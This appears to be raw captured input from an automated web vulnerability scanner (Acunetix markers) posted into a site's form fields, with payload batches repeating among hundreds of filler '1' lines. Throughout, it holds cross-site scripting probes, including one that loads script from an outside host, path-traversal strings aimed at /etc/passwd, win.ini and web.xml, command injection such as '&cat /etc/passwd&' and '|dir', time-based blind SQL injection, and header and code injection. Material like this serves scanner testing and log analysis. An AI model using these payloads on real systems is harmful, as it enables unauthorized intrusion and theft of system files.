1_xG37Z <ScRiPt >prompt(971175)</ScRiPt>

1

1

'|dir

WEB-INF\web.xml

1

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

acu4019\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4019

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

acux4626\xc0\xbez1\xc0\xbcz2a\x90bcxuca4626

1

1

1<ScRiPt >prompt(912271)</ScRiPt>

1

response.write(9788724*9525146)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<script>prompt(977989)</script>

1

1

1

1<ScRiPt >prompt(977514)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9788724*9525146)+'

1

1

1

&cat /etc/passwd&

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?970344></ScRiPt>

"+response.write(9788724*9525146)+"

1

1<ScRiPt >prompt(975317)</ScRiPt>

1

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1<video><source onerror="javascript:prompt(956873)">

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(900273)"></g></svg>

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

1

1<div style=width:expression(prompt(949256))>

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

1<iframe src='data:text/html

1

1

${99091+99119}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<body onload=prompt(994854)>

1

1

1

1

1some_inexistent_file_with_long_name%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n919002=v932025

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968487)>

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1

1

1

'"()

1

'|'ld

!(()&&!|*|*|

1<img src=xyz OnErRor=prompt(994413)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1)

1

1

testasp.vulnweb.com

"|"ld

^(#$!@#$)(()))******

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1))

1<img/src=">" onerror=alert(971783)>

1

1

1

'

fV60q94S'

1

1

1

1<ScRiPt%20>prompt(997933)</sCripT>

/etc/passwd

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

gTCmeHlZ')

"

1&lt

1

'

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

YnqIcEyW'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitrtIQ4kOyvk.bxss.me/

\xf6<img acu onmouseover=prompt(933752) //\xf6>

"

comments

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

-1

1

1

1

1

comments/.

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

http://www.acunetix.tst

||cat /etc/passwd

-1)

1<input autofocus onfocus=prompt(919542)>

1

1'"()&%<ScRiPt >prompt(948026)</ScRiPt>

'"

1

&dir

1

-1))

'"()&%<ScRiPt >prompt(915046)</ScRiPt>

1

1

1

'&dir&'

<!--

<a href='http://www.acunetix.com'>website security</a>

BlLJLd3m'

file:///etc/passwd

1

1_996956

"&dir&"

1

1

[url=http://www.acunetix.com]website security[/url]

/\../\../\../\../\../\../\../etc/passwd

1

LS402MmJ')

|dir

1

1_RavB8 <ScRiPt >prompt(907605)</ScRiPt>

WEB-INF/web.xml

1

1

kySAr9OZ'))

1

'|dir

WEB-INF\web.xml

1

1

1

1

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

acu6104\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6104

../../../../../../../../../../windows/win.ini.jpg

1

1

acux3271\xc0\xbez1\xc0\xbcz2a\x90bcxuca3271

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(937867)</ScRiPt>

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(985184)</script>

1

response.write(9598779*9918487)

1<ScRiPt >prompt(993705)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

&cat /etc/passwd&

'+response.write(9598779*9918487)+'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?932066></ScRiPt>

"+response.write(9598779*9918487)+"

'&cat /etc/passwd&'

1

1<ScRiPt >prompt(918968)</ScRiPt>

1

1

SomeCustomInjectedHeader:injected_by_wvs

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<video><source onerror="javascript:prompt(932072)">

cat /etc/passwd

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

`cat /etc/passwd`

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(990902)"></g></svg>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

WEB-INF/web.xml

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1<div style=width:expression(prompt(957257))>

1

1

|cat /etc/passwd#

../../../../../../../../../../etc/passwd.jpg

1

${100032+100466}

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

WEB-INF\web.xml

1&n951536=v981112

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<iframe src='data:text/html

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1

1

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(928407)>

"|"ld

1

1some_inexistent_file_with_long_name%00.jpg

1

-1)

!(()&&!|*|*|

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988458)>

-1))

1

'

1

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<img src=xyz OnErRor=prompt(971611)>

1

'

testasp.vulnweb.com

mgw25AnH'

1

1

"

1<img/src=">" onerror=alert(991561)>

1

TmdQvMAK')

1

1

/etc/passwd

1

1<ScRiPt%20>prompt(930840)</sCripT>

1

${@print(md5(acunetix_wvs_security_test))}

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

ooA6iEhQ'))

1

1

1

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1&lt

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

http://hitnyOVaxrv5x.bxss.me/

1

1

1

-1)

1

acunetix_wvs_invalid_filename

&dir

\xf6<img acu onmouseover=prompt(950822) //\xf6>

1

-1))

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

1<input autofocus onfocus=prompt(937077)>

1

comments

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

DbufJ8u7'

http://www.acunetix.tst

"&dir&"

<a href='http://www.acunetix.com'>website security</a>

zUIh5h5w')

1

1

1

'"

comments

1

[url=http://www.acunetix.com]website security[/url]

|dir

FNxUPbnr'))

1

1

<!--

'|dir

1_Ltk34 <ScRiPt >prompt(990336)</ScRiPt>

file:///etc/passwd

1'"()&%<ScRiPt >prompt(970961)</ScRiPt>

comments/.

1

"|dir

1

1

1

1

'"()&%<ScRiPt >prompt(978067)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

1

1

1_942050

1

1

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acu8799\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8799

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux1776\xc0\xbez1\xc0\xbcz2a\x90bcxuca1776

1

1

1

................windowswin.ini

1<ScRiPt >prompt(972162)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(980195)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

1<ScRiPt >prompt(921562)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?963195></ScRiPt>

1

1

1<ScRiPt >prompt(945626)</ScRiPt>

WEB-INF/web.xml

1

1

1<video><source onerror="javascript:prompt(915049)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(908188)"></g></svg>

WEB-INF\web.xml

1

1

1<div style=width:expression(prompt(916535))>

1

1

1

1<iframe src='data:text/html

1

1

1

1<body onload=prompt(900058)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(982496)>

1

1<img src=xyz OnErRor=prompt(964910)>

1<img/src=">" onerror=alert(947914)>

1

1<ScRiPt%20>prompt(951028)</sCripT>

1

1&lt

\xf6<img acu onmouseover=prompt(969978) //\xf6>

1

1<input autofocus onfocus=prompt(946868)>

1

<a href='http://www.acunetix.com'>website security</a>

[url=http://www.acunetix.com]website security[/url]

1

1_YOSC9 <ScRiPt >prompt(995799)</ScRiPt>

1

1

1

1

1

1

1

1

response.write(9060887*9413803)

1

'+response.write(9060887*9413803)+'

1

&cat /etc/passwd&

"+response.write(9060887*9413803)+"

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

cat /etc/passwd

1

1

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

${100180+99726}

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

'|'ld

1some_inexistent_file_with_long_name%00.jpg

-1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n960618=v981849

testasp.vulnweb.com

)

-1)

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'"()

!(()&&!|*|*|

-1))

1

1

^(#$!@#$)(()))******

'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

sdiiicoz'

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

"

1

1

yEwdQ4Vl')

1

||cat /etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

/etc/passwd

1

1

gebIQtkj'))

1

1

&dir

http://hitl95UpGXy0G.bxss.me/

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

-1

1

${@print(md5(acunetix_wvs_security_test))}\

comments

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'&dir&'

1

-1)

1

1

comments

'"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"&dir&"

1

1'"()&%<ScRiPt >prompt(935543)</ScRiPt>

-1))

<!--

comments/.

1

D7YC8DBU'

'"()&%<ScRiPt >prompt(904113)</ScRiPt>

|dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1_913636

1

w2BxMQ5b')

'|dir

1

1

1

RrMivtjk'))

file:///etc/passwd

"|dir

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

acu6581\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6581

1

1

../../../../../../../../../../windows/win.ini.jpg

acux2965\xc0\xbez1\xc0\xbcz2a\x90bcxuca2965

1

1<ScRiPt >prompt(912888)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(953353)</script>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(943957)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?914285></ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(902383)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(909098)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983358)"></g></svg>

1

1

1<div style=width:expression(prompt(960792))>

1

WEB-INF/web.xml

1<iframe src='data:text/html

1

WEB-INF\web.xml

1<body onload=prompt(941815)>

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(956860)>

1

1

1<img src=xyz OnErRor=prompt(918299)>

1

1<img/src=">" onerror=alert(904081)>

1<ScRiPt%20>prompt(943672)</sCripT>

1

1&lt

1

\xf6<img acu onmouseover=prompt(933380) //\xf6>

1

1<input autofocus onfocus=prompt(996330)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1_iWCnw <ScRiPt >prompt(931194)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1&n981721=v931205

)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

response.write(9709800*9084052)

&cat /etc/passwd&

1

1

${99262+99288}

1

!(()&&!|*|*|

SomeCustomInjectedHeader:injected_by_wvs

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'+response.write(9709800*9084052)+'

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

^(#$!@#$)(()))******

'"()

"+response.write(9709800*9084052)+"

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

../../../../../../../../../../etc/passwd.jpg

1

1

"&cat /etc/passwd&"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

testasp.vulnweb.com

1

1

'

cat /etc/passwd

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

http://hit2gKBv8matB.bxss.me/

1

1

"

`cat /etc/passwd`

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

${@print(md5(acunetix_wvs_security_test))}

1

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

|cat /etc/passwd#

${@print(md5(acunetix_wvs_security_test))}\

'"

1

1

comments

/etc/passwd

-1

1

1'"()&%<ScRiPt >prompt(925819)</ScRiPt>

<!--

comments

'|'ld

-1)

'"()&%<ScRiPt >prompt(935136)</ScRiPt>

comments/.

1

1

1

1_945197

-1))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"|"ld

1

1

1

1

rQMRvERp'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

iHFpowyz')

1

1

'

EBPtY2pW'))

1

-1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

"

-1)

||cat /etc/passwd

-1))

file:///etc/passwd

acu10266\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10266

RTZnIONq'

&dir

/\../\../\../\../\../\../\../etc/passwd

UwyL6KDf')

kDhiSPhS'))

acux6603\xc0\xbez1\xc0\xbcz2a\x90bcxuca6603

WEB-INF/web.xml

'&dir&'

1

WEB-INF\web.xml

1<ScRiPt >prompt(911424)</ScRiPt>

"&dir&"

../../../../../../../../../../windows/win.ini

1<script>prompt(930958)</script>

|dir

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(990000)</ScRiPt>

'|dir

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995017></ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

"|dir

1<ScRiPt >prompt(961980)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<video><source onerror="javascript:prompt(953062)">

1

1

................windowswin.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936424)"></g></svg>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<div style=width:expression(prompt(931158))>

1

1

1<iframe src='data:text/html

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<body onload=prompt(961343)>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(970171)>

1

1

1<img src=xyz OnErRor=prompt(973244)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<img/src=">" onerror=alert(968417)>

1

1<ScRiPt%20>prompt(942988)</sCripT>

1

WEB-INF/web.xml

1&lt

1

WEB-INF\web.xml

\xf6<img acu onmouseover=prompt(907569) //\xf6>

1

1

1<input autofocus onfocus=prompt(980845)>

1

1

1

<a href='http://www.acunetix.com'>website security</a>

[url=http://www.acunetix.com]website security[/url]

1

1

1_iJUdN <ScRiPt >prompt(939411)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9153788*9785141)

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9153788*9785141)+'

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9153788*9785141)+"

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd.jpg

${99211+100360}

1

1

1

1

cat /etc/passwd

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

)

`cat /etc/passwd`

1&n961947=v913384

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1some_inexistent_file_with_long_name%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

!(()&&!|*|*|

|cat /etc/passwd#

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

^(#$!@#$)(()))******

'

'|'ld

testasp.vulnweb.com

1

-1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1

"|"ld

1

1

1

1

1

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

http://hit4kYJVEzSbj.bxss.me/

-1))

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

acunetix_wvs_invalid_filename

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

'

gX5SgIlL'

http://www.acunetix.tst

1

comments

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

'"

NHas5pzc')

1

1

1

1'"()&%<ScRiPt >prompt(942621)</ScRiPt>

comments

1

||cat /etc/passwd

88UIoAlt'))

<!--

1

'"()&%<ScRiPt >prompt(953961)</ScRiPt>

comments/.

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

&dir

-1

1

1

1

1_941716

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

'&dir&'

-1)

1

1

1

-1))

"&dir&"

1

file:///etc/passwd

Uyi2mCl3'

1

1

|dir

FsevxRp7')

/\../\../\../\../\../\../\../etc/passwd

1

1

wObFIkAl'))

'|dir

WEB-INF/web.xml

1

acu3689\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3689

1

"|dir

WEB-INF\web.xml

acux4180\xc0\xbez1\xc0\xbcz2a\x90bcxuca4180

1

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(981158)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1

1<script>prompt(949350)</script>

1

1<ScRiPt >prompt(917580)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?949618></ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(928336)</ScRiPt>

1

1

................windowswin.ini

1<video><source onerror="javascript:prompt(913719)">

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(914010)"></g></svg>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<div style=width:expression(prompt(908419))>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<iframe src='data:text/html

1

1<body onload=prompt(911859)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(972865)>

1

1

1<img src=xyz OnErRor=prompt(993137)>

1

WEB-INF/web.xml

1

1

1<img/src=">" onerror=alert(968052)>

WEB-INF\web.xml

1<ScRiPt%20>prompt(966798)</sCripT>

1

1

1&lt

1

1

1

\xf6<img acu onmouseover=prompt(971421) //\xf6>

1

1

1

1<input autofocus onfocus=prompt(968699)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1

1_ioliz <ScRiPt >prompt(901826)</ScRiPt>

1

1

1

1

1

1

1

response.write(9102704*9254768)

&cat /etc/passwd&

1

'+response.write(9102704*9254768)+'

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

"+response.write(9102704*9254768)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

${99651+100460}

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1

`cat /etc/passwd`

1some_inexistent_file_with_long_name%00.jpg

1&n990515=v934925

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

)

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

!(()&&!|*|*|

'"()

